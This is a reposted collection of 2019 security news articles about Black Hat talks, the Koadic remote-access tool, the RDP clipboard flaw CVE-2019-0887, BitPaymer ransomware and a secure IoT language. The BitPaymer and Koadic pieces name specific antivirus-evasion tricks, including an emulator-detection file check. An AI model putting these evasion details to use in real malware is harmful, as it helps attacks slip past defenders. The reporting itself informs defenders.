STE WILLIAMS

Cybersecurity professionals, take note: There’s an entire track of Platform Security Briefings lined up for Black Hat USA this August that will equip you with the latest knowledge, tools, and tricks to improve or compromise the security of iOS Windows hardware and software.

Apple security professionals will be presenting Behind the scenes of iOS and Mac Security, an in-depth 50-minute Briefing that will demo everything from code integrity enforcement on Apple chips (including the A12 Bionic and S4) to the T2 security chip. You’ll get a guided walkthrough of processes like the T2 secure boot, with stops along the way to examine common attacks and defenses at each stage. Most importantly, you’ll be introduced to two publicly undisclosed firmware security measures.

For outside perspective on the same tech check out Inside The Apple T2, in which Duo Labs researchers will give you an assessment of the T2 chip’s security posture and the strengths and weaknesses of its communication with MacOS. They’ll also demonstrate the ability to interface directly with the T2 chip from unprivileged user space code by writing their own client application, and present methods and tooling to query the T2’s exposed services as well as decode and encode valid messages.

For some insight into the security of Microsoft’s Windows platform, make time to attend Battle of Windows Service: A Silver Bullet to Discover File Privilege Escalation Bugs Automatically. In this 25-minute Briefing you’ll see how one researcher created a “silver bullet” to discover Windows 10 file privilege escalation bugs, then used it to discover at least four new vulnerabilities. You’ll also see how this technique makes use of the Advanced Local Procedure Call (ALPC), found new attack surfaces, and devised a system to discover file privilege escalation bugs automatically. Plus, you’ll learn advanced skills about how to exploit those vulnerabilities, bypass the security check, and play with impersonation. Don’t miss it!

Black Hat USA returns to the Mandalay Bay in Las Vegas August 3-8, 2019. For more information on what’s happening at the event and how to register, check out the Black Hat website.

Article source: https://www.darkreading.com/black-hat/crack-the-defenses-of-ios-and-other-platforms-at-black-hat-usa/d/d-id/1335293?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

An open source white-hat hacking tool that nation-state hacking teams out of China, Iran, and Russia have at times employed to avoid detection has been updated with new features that allow attacks to persist and spread more efficiently.

Sean Dillon, creator of the so-called Koadic tool that works like a remote access Trojan (RAT), says the software he first released two years ago at DEF CON can now extract information and intelligence about a targeted Windows environment, more efficiently scrape user credentials, and more easily spread around a network. “It’s much more efficient now. It can be used to compromise entire networks in a matter of minutes,” says Dillon, who plans to show off Koadic’s new features next month at the Black Hat USA Arsenal in Las Vegas.

Koadic is basically a RAT based on VBScript and JScript that uses Windows executables such a PowerShell rather than malware, so it mimics a growing trend of sophisticated attackers employing legitimate tools instead of writing or burning their own exploits. The trend, known as “living off the land,” also allows attackers to remain under the radar as they run internal Windows tools like PowerShell to hack their way through networks.

Koadic uses built-in Windows executables and most recently added a Windows Management Interface and SysAdmin to its quiver. “These are binaries that are shipped by default with all versions of Windows,” Dillon notes, and they are signed by Microsoft so they can slip past most whitelisting applications. The original version of Koadic targeted a single machine and had little ability to move laterally to other machines.

“We now have several different ways to poke into the system, and when a computer is back up from a restart” the attack will continue, he notes.

Among some of the newer features: UAC (user account control) bypasses, automated file-discovery, and credential storage that converts Mimikatz outputs into a searchable form.

Nation-state groups, such as China’s Stone Panda, Iran’s MuddyWater, and Russia’s Fancy Bear, all have been spotted using Koadic in their hacking campaigns. “In the past year or two, APT groups have been using open source tools in order to hide out,” Dillon says. “If they write custom malware, the attack could be attributed to them. … If they use something open source, it’s hard to see who is attacking an organization.”

But Dillon’s intent for the tool is to help professional penetration testers find holes before the bad guys do. Still, Koadic today continues to easily bypass most endpoint security tools: “Every time [the vendors] come up with a detection for it, we come up with another evasion,” he says. Sometimes it’s only a matter of changing a comma or a word in the string, and it breaks the anti-malware vendor’s detection signature, he notes.

That underscores the need for better behavioral detection methods for defenses, he adds.

Related Content:

• The Rise of ‘Purple Teaming’
• Effective Pen Tests Follow These 7 Steps
• Too Many Tools? Tidy Up in ‘KonMari’ Style
• The State of IT Operations and Cybersecurity Operations 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Jackson Higgins is Executive Editor at DarkReading.com. She is an award-winning veteran technology and business journalist with more than two decades of experience in reporting and editing for various publications, including Network Computing, Secure Enterprise … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/open-source-hacking-tool-grows-up/d/d-id/1335296?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Most security professionals know they can use Microsoft’s Remote Desktop Protocol (RDP) to connect to other machines but may not consider how merely using RDP could compromise one.

A recently discovered RDP vulnerability could silently compromise a host when it connects to a rogue machine, researchers report. CVE-2019-0887, discovered by Eyal Itkin, a vulnerability researcher with Check Point Software Technologies, was classified as Important and patched this month. Microsoft has not yet seen any evidence this flaw has been exploited in the wild.

The remote code execution bug is in Remote Desktop Services, formerly known as Terminal Services, when an authenticated attacker abuses clipboard redirection. A successful attacker could execute malicious code on a target system; install programs; view, change, or delete data; or create new accounts with full user rights. To exploit the vulnerability, however, an attacker must first compromise Remote Desktop Services and wait for a victim system to connect.

Most RDP vulnerabilities allow an attacker to compromise the server, then approach new victim machines using RDP, says Dana Baril, security software engineer at Microsoft. An example is BlueKeep, the critical remote code execution vulnerability that prompted Microsoft to issue patches for out-of-support Windows systems when it fixed the bug in June. BlueKeep could let unauthenticated attackers break into a server and abuse a bug in the server itself.

“Most of the time people look for vulnerabilities in the server and try to expand from their computer to a new one on the network,” Itkin explains. This flaw is different.

“In this case, the victim machine is the one that initiated the connection,” Baril continues. “We have one compromised machine using lateral movement technique; this gets connections from victim machines and spreads the exploit.”

Itkin was researching lateral movement attack vectors when he discovered the vulnerability. “If we take over a single machine and ambush a single user or IT admin, we directly get privilege without moving around a network too much,” he explains. This specific bug exists in the clipboard, particularly in the way it synchronizes communication between the client and server.

By default, when a host connects to a machine, the clipboard connects the client and server. When a client copies a file from the server, the server tells the client where to store them. If attackers have control over a single device, they can slow it down, post pop-up messages, or cause other distractions so the corporate user opens a ticket and says the machine isn’t working.

“Usually when you take over a machine you try to be stealth,” says Itkin. But because an attacker wants the IT manager to remotely connect to their target using RDP, “we make a lot of noise, and we make IT users to connect to a machine and check it out.” When the client connects, the attacker could use the clipboard function to download and store malicious files.

Clipboards were designed to be used locally and therefore trusted, Baril adds. This vulnerability exposes machines to a clipboard they can no longer trust. Baril and Itkin will discuss the details of the vulnerability, and approach the attack from both offensive and defensive perspectives, in their upcoming Black Hat USA briefing, “He Said, She Said — Poisoned RDP Offense and Defense.”

Following his discovery, Itkin informed Microsoft and went through the coordinated vulnerability disclosure process. After Microsoft issued a patch, he continued to collaborate with the research team and later found the same bug was inherited by Hyper-V; the Hyper-V manager uses RPD under the hood to manage virtual machines. Both issues are now fixed.

While companies should install the patch to fully protect themselves, Baril notes this technique can be detected with internal Windows telemetry. “This attack technique was very hard to detect using existing telemetry,” she says, adding that normal detection wouldn’t work because this behavior doesn’t appear unusual to users. To help users before they install the patch, Microsoft created behavioral detection using Windows Event Log. Researchers used the clipboard and RDP events to generate detection logic that could detect this tactic in action so businesses will know if they’re targeted even if they haven’t yet applied the update.

Related Content:

• How Capture the Flag Competitions Strengthen the Cybersecurity Workforce
• The State of IT Operations and Cybersecurity Operations
• Bluetooth Bug Enables Tracking on Windows 10, iOS macOS Devices
• The 10 Essentials of Infosec Forensics
• Security Snapshot: OS, Authentication, Browser Cloud Trends

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/risk/rdp-bug-takes-new-approach-to-host-compromise/d/d-id/1335297?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The BitPaymer ransomware operators now are creating new variants of the malware hours before deploying it on a target network – making detection much more difficult.

Researchers from Morphisec say they have observed the tactic being used against numerous public and private sector organizations across the US over the last three months.

In a report Thursday, the security vendor said it is aware of at least 15 organizations including those in the finance, agriculture, and technology sectors that have been targeted in this way. Most had between 200 and 1,000 employees, while two of the victims employed more than 2,000 people. Numerous servers belonging to at least two of the targeted organizations were infected.

In each of the attacks, the threat group gained initial access to the target network via phishing emails that distributed Dridex, a well-known data and credential-stealing malware. Once on the network, the attacker stole Active Directory credentials and conducted reconnaissance for sensitive servers and systems to infect. They then waited for the weekend to actually deploy the ransomware.  

“This carefully planned timing allows them to propagate the ransomware to 24/7 running servers and then spread as the first employees returning to work from the weekend login to the compromised network,” Morphisec said.

Michael Gorelik, CTO at Morphisec, says what makes the latest BitPaymer campaign interesting is a new attack framework that enables the threat group to obfuscate and compile a custom loader for the malware literally hours before it is deployed.

The ransomware payload version itself that is being used in the attacks was complied about four months ago, and has been used in previous campaigns including one that disrupted operations in a major way at Arizona Beverages last May. But by wrapping the payload in new loaders for each target just hours before attacking them, the BitPaymer attackers are making it much harder for signature-based detection tools to spot the malware, Gorelik says.

Also complicating matters for targeted organizations are the sophisticated tactics that threat group has begun using to evade detection by static and behavior-based detection tools. Upon loading, BitPaymer like many other malware tools looks for certain clues about where it is running and terminates automatically under certain conditions.

But one new tactic the malware uses—first described by a security researcher at Black Hat 2018—is to look for a specific dummy file (“C:\aaa_TouchMeNot.txt”) that is found only in a Windows Defender AV Emulator environment and to terminate execution if it spots the file. “If the malware sees the file it stops working, so the emulator thinks it’s harmless,” Gorelik says. “But when the malware runs in the real environment it suddenly starts working.”

There are multiple other features in the malware that make it dangerous as well, he says. One is a function that allows the malware to bypass User Account Control (UAC) settings to elevate its privileges on an infected system. When running with elevated privileges, the malware erases shadow copy files from the infected host – making recovery harder. BitPaymer also includes several obfuscation capabilities, including the use of a lot of junk code, to make it tough to spot.

Growing Targeted Threat

For organizations, ransomware like BitPaymer once again highlight the importance of preventive controls, Gorelik says. None of the sophisticated features the malware incorporates would matter if enterprises can prevent it from getting an initial foothold in the first place, he says.

This latest BitPaymer campaign is consistent with other reports about a sharp spike in targeted ransomware attacks over the past year. Increasingly, attackers have begun eschewing mass low-payoff attacks for highly targeted ones against medium and large companies where the potential returns are several magnitudes higher.

Hackers hit the city of Riviera Beach, Florida, this June, for example, and collected $600,000 after officials there decided to pay the demanded ransom rather than risk lengthy downtime in recovering encrypted systems. Lake City, in Florida paid $460,000 a few weeks later for the same reason.

A new report from Coveware shows that average ransom payments increased 184% between the first and second quarter this year – from $12,762 to $36,295. Much of the increase stemmed from the growing prevalence of Ryuk and Sodinokibi, two ransomware variants associated with high ransom demands.

Significantly, the average downtime following a ransomware attack also jumped substantially from 7.3 days in Q1 to 9.6 days in the second quarter. The Coveware study found that organizations that paid off their attackers received a decryption key 96% of the time and were able on average to recover about 92% of their encrypted data.

Related Content:

• Florida Town Pays $600K to Ransomware Operators
• US Mayors Commit to Just Saying No to Ransomware
• The State of IT Operations and Cybersecurity Operations
• 8 Legit Tools and Utilities That Cybercriminals Commonly Misuse 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions and service providers in the Business Hall. Click for information on the conference and to register.

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/bitpaymer-ransomware-operators-wage-custom-targeted-attacks/d/d-id/1335298?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

When a security researcher needs to create an application, there are many choices in terms of programming languages and frameworks. But when project requirements include SSL and an embedded Internet of Things (IoT) platform, the number of good options becomes limited. That’s why Thomas Pornin decided to build his own language.

Pornin, who is technical director and member of the cryptography services practice at NCC Group, has been thinking about programming languages, their strengths, and their weaknesses for more than 30 years. He has worked on many different, complex tech deployments and has the experience of launching an open source project, BearSSL, an SSL stack that is smaller than most SSL implementations available to developers.

The language Pornin wanted to build had two significant requirements: First, its resulting applications had to fit onto a resource-constrained IoT device, and that those applications performed reasonably well. Next, the applications developed using the language would not be subject to certain built-in vulnerabilities seen in some applications. Those vulnerabilities tend to revolve around the way the processor allocates and uses memory, so Pornin focused on memory in his thinking about language security.

Getting the project started took time. “I took care to write a big specification, a 65-page document,” Pornin says. “In it, I explained how it should work and why it should work that way.”

From Spec to Language
The initial specification was the basis for T0, Pornin’s first pass at the programming language. T0 was designed to create applications that would work on an embedded system — defined as one with severely limited memory resources, a CPU that’s not very powerful, no memory management unit, and no operating system to mediate the application’s interaction with the hardware.

Pornin decided to base the design of his secure IoT language on Forth — a programming language that is oriented around the idea of stacks (memory structures where the last item pushed in is the first thing pulled out). He says the decision was partially driven by practical considerations about the discipline that stacks impose on the way memory is used, and partially by aesthetics. The stack orientation means that Forth code uses a distinctive notation (Reverse Polish Notation) familiar to anyone who used an HP calculator without the “=” key.

T0 was able to create compact, operational code. Pornin simplified the job of writing the T0 compiler by having it produce C source code as its output — code that then had to be recompiled and linked into the final executable code using an existing C compiler. It was much of what he wanted, but it was not yet secure. That waited for T1.

The Next Step
In T1, which Pornin described in a presentation at NorthSec 2019, protection for memory and restrictions on stacks were introduced. While Pornin is still working on building out the details of T1 and creating the full compiler for the language, he believes the language is moving in his desired direction.

There are already a number of languages that can be used for embedded applications. Depending on the hardware in use, C, Java ME, Go, Rust Embedded, and Forth may be possibilities. So does Pornin think other security practitioners should write their own programming languages?

“I think that anybody who is really serious about development should have the idea somewhere in their head,” he says. “They should think about what they would like to see in a programming language.” He adds with a laugh, “And it would also be good for people at large if most would stop before actually doing it.”

It is useful, though, for developers and security practitioners to understand how the compilers work and the sort of code they produce. Understanding whether they create code that makes the most of memory protection and memory structures available in the hardware can help them write more secure, more robust applications.

Related Content:

• Cyber Talent Gap? Don’t Think Like Tinder!
• Russian Nation-State Hacking Unit’s Tools Get More Fancy
• Korean APT Adds Rare Bluetooth Device-Harvester Tool
• War on Zero-Days: 4 Lessons from Recent Google Microsoft Vulns
• 6 Ways Effective CISOs Are Changing their Role
• The State of IT Operations and Cybersecurity Operations 

Black Hat USA returns to Las Vegas with hands-on technical Trainings, cutting-edge Briefings, Arsenal open-source tool demonstrations, top-tier security solutions, and service providers in the Business Hall. Click for information on the conference and to register.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/application-security/security-lessons-from-a-new-programming-language/d/d-id/1335300?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple